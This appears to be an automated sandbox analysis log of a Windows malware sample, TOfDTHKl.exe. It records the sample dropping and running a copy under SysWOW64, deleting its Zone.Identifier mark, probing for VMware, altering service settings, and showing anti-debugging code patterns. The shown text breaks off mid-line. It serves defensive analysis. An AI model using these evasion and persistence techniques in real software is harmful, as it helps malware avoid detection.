                Source: C:\Users\user\Desktop\TOfDTHKl.exeProcess created: C:\Windows\SysWOW64\Faultrep\unregmp2.exe C:\Windows\SysWOW64\Faultrep\unregmp2.exeJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                Source: C:\Users\user\Desktop\TOfDTHKl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: TOfDTHKl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: awWindow.pdb source: TOfDTHKl.exe
                Source: Binary string: c:\Users\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdbPA source: TOfDTHKl.exe
                Source: Binary string: ctures\111\drawwindow_src\Release\DrawWindow.pdb source: TOfDTHKl.exe
                Source: Binary string: c:\Users\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdb source: TOfDTHKl.exe
                Source: Binary string: sers\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdb source: TOfDTHKl.exe
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0040BD50 LoadLibraryW,GetProcAddress,1_2_0040BD50
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_00403AD7 push ecx; ret 1_2_00403AE7
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_00404CA0 push eax; ret 1_2_00404CB4
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_00404CA0 push eax; ret 1_2_00404CDC
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_00402BF8 push eax; ret 1_2_00402C16
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085E10 push ecx; mov dword ptr [esp], 00006163h1_2_02085E11
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02086030 push ecx; mov dword ptr [esp], 00002DB0h1_2_02086031
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085E60 push ecx; mov dword ptr [esp], 0000FB39h1_2_02085E61
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02086080 push ecx; mov dword ptr [esp], 000093C3h1_2_02086081
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085EA0 push ecx; mov dword ptr [esp], 0000B3C5h1_2_02085EA1
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085EC0 push ecx; mov dword ptr [esp], 0000C070h1_2_02085EC1
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085F20 push ecx; mov dword ptr [esp], 00003106h1_2_02085F21
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085F40 push ecx; mov dword ptr [esp], 0000A80Dh1_2_02085F41
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085F80 push ecx; mov dword ptr [esp], 0000FC88h1_2_02085F81
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085DC0 push ecx; mov dword ptr [esp], 00009C10h1_2_02085DC1
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085FE0 push ecx; mov dword ptr [esp], 0000CC57h1_2_02085FE1
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02057C1E push ecx; mov dword ptr [esp], 000093C3h1_2_02057C1F
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02058C1E push edi; ret 1_2_02058C24
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02057A3E push ecx; mov dword ptr [esp], 0000B3C5h1_2_02057A3F
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02057A5E push ecx; mov dword ptr [esp], 0000C070h1_2_02057A5F
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02057ABE push ecx; mov dword ptr [esp], 00003106h1_2_02057ABF
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02057ADE push ecx; mov dword ptr [esp], 0000A80Dh1_2_02057ADF
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205DAF5 push ss; ret 1_2_0205DB22
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205D71C push FFFFFFB9h; iretd 1_2_0205D731
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02057B1E push ecx; mov dword ptr [esp], 0000FC88h1_2_02057B1F
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205795E push ecx; mov dword ptr [esp], 00009C10h1_2_0205795F
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02057B7E push ecx; mov dword ptr [esp], 0000CC57h1_2_02057B7F
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_020579AE push ecx; mov dword ptr [esp], 00006163h1_2_020579AF
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02057BCE push ecx; mov dword ptr [esp], 00002DB0h1_2_02057BCF
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_020579FE push ecx; mov dword ptr [esp], 0000FB39h1_2_020579FF
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exeCode function: 3_2_00403AD7 push ecx; ret 3_2_00403AE7
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exeCode function: 3_2_00404CA0 push eax; ret 3_2_00404CB4

                Persistence and Installation Behavior:

                barindex
                Drops executables to the windows directory (C:\Windows) and starts themShow sources
                Source: C:\Users\user\Desktop\TOfDTHKl.exeExecutable created and started: C:\Windows\SysWOW64\Faultrep\unregmp2.exeJump to behavior
                Source: C:\Users\user\Desktop\TOfDTHKl.exePE file moved: C:\Windows\SysWOW64\Faultrep\unregmp2.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\Desktop\TOfDTHKl.exeFile opened: C:\Windows\SysWOW64\Faultrep\unregmp2.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TOfDTHKl.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,EnumServicesStatusExW,GetTickCount,OpenServiceW,OpenServiceW,ChangeServiceConfig2W,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,1_2_02085070
                Source: C:\Windows\System32\svchost.exe TID: 6216Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6328Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\TOfDTHKl.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02083810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,1_2_02083810
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_00407513 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,1_2_00407513
                Source: svchost.exe, 00000002.00000002.473311819.00000217CD340000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.265571806.0000029D40F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.280237757.000001F7DCD40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.341483269.000001CA74940000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.373468554.0000026967000000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000008.00000002.475677078.000002179C25E000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 00000000.00000002.471745678.00000292AAE02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: unregmp2.exe, 00000003.00000002.475337385.0000000002A1C000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.471662434.0000021796C24000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.372060116.0000026966282000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000002.00000002.473311819.00000217CD340000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.265571806.0000029D40F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.280237757.000001F7DCD40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.341483269.000001CA74940000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.373468554.0000026967000000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000002.00000002.473311819.00000217CD340000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.265571806.0000029D40F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.280237757.000001F7DCD40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.341483269.000001CA74940000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.373468554.0000026967000000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: unregmp2.exe, 00000003.00000002.475237596.0000000002A10000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000012.00000002.372209835.00000269662E3000.00000004.00000001.sdmpBinary or memory string: Paramet$@Hyper-V RAWs\{BB556C50-98D0-4585-A1ED-B2838757AE1B}
                Source: svchost.exe, 00000000.00000002.471840960.00000292AAE28000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.471311602.00000217CC66C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.471991814.000002AD15A2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000002.00000002.473311819.00000217CD340000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.265571806.0000029D40F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.280237757.000001F7DCD40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.341483269.000001CA74940000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.373468554.0000026967000000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0040BD50 LoadLibraryW,GetProcAddress,1_2_0040BD50
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02084E20 mov eax, dword ptr fs:[00000030h]1_2_02084E20
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02083EE0 mov eax, dword ptr fs:[00000030h]1_2_02083EE0
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02050456 mov eax, dword ptr fs:[00000030h]1_2_02050456
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02055A7E mov eax, dword ptr fs:[00000030h]1_2_02055A7E
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205095E mov eax, dword ptr fs:[00000030h]1_2_0205095E
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_020569BE mov eax, dword ptr fs:[00000030h]1_2_020569BE
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02061030 mov eax, dword ptr fs:[00000030h]1_2_02061030
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02083810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,1_2_02083810
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0040568A SetUnhandledExceptionFilter,1_2_0040568A
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0040569E SetUnhandledExceptionFilter,1_2_0040569E
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exeCode function: 3_2_0040568A SetUnhandledExceptionFilter,3_2_0040568A
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exeCode function: 3_2_0040569E SetUnhandledExceptionFilter,3_2_0040569E
                Source: unregmp2.exe, 00000003.00000002.472321916.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.472132576.000002071B790000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: unregmp2.exe, 00000003.00000002.472321916.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.472132576.000002071B790000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: unregmp2.exe, 00000003.00000002.472321916.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.472132576.000002071B790000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: unregmp2.exe, 00000003.00000002.472321916.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.472132576.000002071B790000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: GetLocaleInfoA,1_2_00407307
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exeCode function: GetLocaleInfoA,3_2_00407307
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQu